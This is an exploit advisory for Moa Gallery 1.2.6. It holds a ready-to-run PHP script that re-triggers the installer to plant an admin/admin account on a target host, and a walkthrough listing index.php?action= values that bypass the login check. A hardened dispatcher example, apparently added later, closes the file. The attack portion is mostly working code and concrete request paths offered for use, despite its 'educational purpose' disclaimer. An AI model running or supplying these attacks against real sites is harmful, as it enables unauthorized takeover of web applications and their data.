#!/usr/bin/php
# Exploit Title : Moa Gallery 1.2.6 Multiple Vulnerabilities
# Date : 5/17/2013
# Author: Slotleet
# Slotleet () GMAIL com
# https://fb.com/Slotleet
# Vendor Homepage: http://www.moagallery.net/
# Version affected : 1.2.6
# Tested on: WIN 7 Xd4rk EDITION
# Greets : Faris , Sec4ever , Omleet-dz , RAB3OUN , b0x , Damane , Mohamed-bel , The Injector , Ahmad Ramahi , Ziad-dz , And Again Faris :P
#
# this was written for educational purpose only. use it at your own risk.
# `AUTHOR` will be not responsible for any damage caused! user assumes all responsibility
# intended for authorized web application pentesting only!
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Moa Gallery 1.2.6 Multiple Vulnerabilities
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~ [Add Admin]
<?php
error_reporting(0);

// Usage check: the target host and the application directory are required.
if ($argc < 3) {
    echo "+--------------------------------------+\n";
    echo "+ Usage : $argv[0] localhost /moe/ +\n";
    echo "+--------------------------------------+\n";
    die();
}

$site = $argv[1];
$dir  = $argv[2];

// POST the admin credentials to the installer's stage3a step.
$ch = curl_init("http://$site/$dir/install.php?stage=stage3a");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, "Moeuser=admin&Moepass=admin");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$result = curl_exec($ch);
curl_close($ch);

if ($result) {
    echo "+-------------------------------------===--+\n";
    echo "+ Done ~ Username : Admin Password : Admin +\n";
    echo "+--------------------------------===-------+\n";
}
?>
~ [Session Bypass]
 1  // Redirect admin access for anyone not logged in
 2  if ((!UserIsLoggedIn()) && (0 == strcmp(substr($action, 0, 5), 'admin')))
 3  {
 4      $action = 'login';
 5  }
 6
 7  switch($action)
 8  {
 9      case "admin" :
10      {
11          include_once("sources/page_admin.php");
12          break;
13      }
14      case "admin_ftp" :
15      {
16          include_once("sources/page_admin_ftp.php");
17          break;
18      }
Look at line 2: there is a function called UserIsLoggedIn() that checks whether the admin is logged in, but it is only applied when the `action` parameter starts with 'admin'. The `action` parameter is then passed to the switch/case, which includes the matching file from the sources folder :).
Let's see if there is a UserIsLoggedIn() check in those files :).
// Only proceed if a user is logged in
if (!UserIsLoggedIn())
{
Aahhh, there is ;). I checked those files, and the check can be bypassed by browsing index.php?action=<one of the names below>:
page_gallery_add.php
page_gallery_view.php
page_image_view.php
page_image_view_full.php
page_main_view.php
page_sitemap.php
page_slideshow.php
page_upgrade.php
We can browse them via index.php?action=gallery_add, i.e. the file name without the page_ prefix :)
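As an added example (not Moa Gallery's own code), here is a hardened form of the index.php dispatcher quoted above: the login decision is made from an explicit allow-list for every action rather than from a string-prefix test on 'admin', and unknown actions can never select a file in sources/. UserIsLoggedIn() is assumed to exist as on the page; which actions are public and the file name page_login.php are assumptions.

```php
<?php
// Added example, not the project's code. Assumes UserIsLoggedIn() exists.

// Allow-list of known actions, each mapped to its file and to whether it
// requires an authenticated user. The public/protected split is illustrative.
$actions = [
    'main_view'       => ['file' => 'page_main_view.php',       'auth' => false],
    'gallery_view'    => ['file' => 'page_gallery_view.php',    'auth' => false],
    'image_view'      => ['file' => 'page_image_view.php',      'auth' => false],
    'image_view_full' => ['file' => 'page_image_view_full.php', 'auth' => false],
    'sitemap'         => ['file' => 'page_sitemap.php',         'auth' => false],
    'slideshow'       => ['file' => 'page_slideshow.php',       'auth' => false],
    'gallery_add'     => ['file' => 'page_gallery_add.php',     'auth' => true],
    'upgrade'         => ['file' => 'page_upgrade.php',         'auth' => true],
    'admin'           => ['file' => 'page_admin.php',           'auth' => true],
    'admin_ftp'       => ['file' => 'page_admin_ftp.php',       'auth' => true],
];

/**
 * Decide which action to run. Returns 'login' when the requested action
 * is protected and no user is logged in; falls back to the public main
 * view for any action that is not on the allow-list.
 */
function resolve_action(array $actions, string $requested, bool $loggedIn): string
{
    if (!isset($actions[$requested])) {
        return 'main_view';
    }
    // The auth check happens here for every protected action, not only for
    // those whose name happens to start with "admin".
    if ($actions[$requested]['auth'] && !$loggedIn) {
        return 'login';
    }
    return $requested;
}

$requested = isset($_GET['action']) ? (string) $_GET['action'] : 'main_view';
$action    = resolve_action($actions, $requested, UserIsLoggedIn());

if ($action === 'login') {
    include_once 'sources/page_login.php';   // assumed login page file name
} else {
    // Only file names taken from the allow-list are ever included.
    include_once 'sources/' . $actions[$action]['file'];
}
```

Because the included path is always taken from the allow-list rather than built from the request, the per-file UserIsLoggedIn() checks in sources/ become defence in depth instead of the only barrier.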
./EOF